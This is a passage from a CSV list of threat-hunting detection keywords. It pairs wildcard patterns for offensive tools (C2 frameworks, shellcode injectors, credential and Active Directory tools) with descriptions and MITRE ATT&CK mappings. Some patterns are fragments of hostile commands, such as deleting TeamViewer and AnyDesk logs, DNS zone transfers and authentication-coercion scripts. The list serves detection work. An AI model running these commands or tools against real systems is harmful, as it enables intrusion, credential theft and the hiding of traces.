T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_PythonRunInMem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_SessionClone.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_WindowsSystem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DeimosC2*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*delegation_constrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*delegation_constrained_w_protocol_transition_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*delegation_rbcd_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*delegation_unconstrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*deliver.exe -d -c * -f*.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*deliver.exe -d -f *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*dementor.py -d * -u * -p *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","rough PoC to connect to spoolss to elicit machine account authentication","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*demo-bof.cna*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*demo-client.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*demo-controller.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Dendrobate-master*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*dendron*FileMonInject.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*-destPipe * -pipeHost * -bindPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*detect ntdll.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*detect-hooksx64.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*devtunnel create *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel host -p *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel* user login -d*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel.exe *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dfkdflfgjdajbhocmfjolpjbebdkcjog*","greyware_tool_keyword","Free Avira Phantom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dfscoerce.py -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dfscoerce.py*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DFSCoerce-main*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dhadilbmmjiooceioladdphemaliiobo*","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Dialupass.exe*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Dialupass.zip*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dicts*generic-usernames.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*dig * axfr *@*","greyware_tool_keyword","dig","dig","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dig *@* axfr*","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dig axfr * @*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dinjector /i:* /p:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*DInjector.csproj*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*DInjector.Detonator*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*DInjector.dll*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*DInjector/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Dinjector-main*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Dionach*PassHunt*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 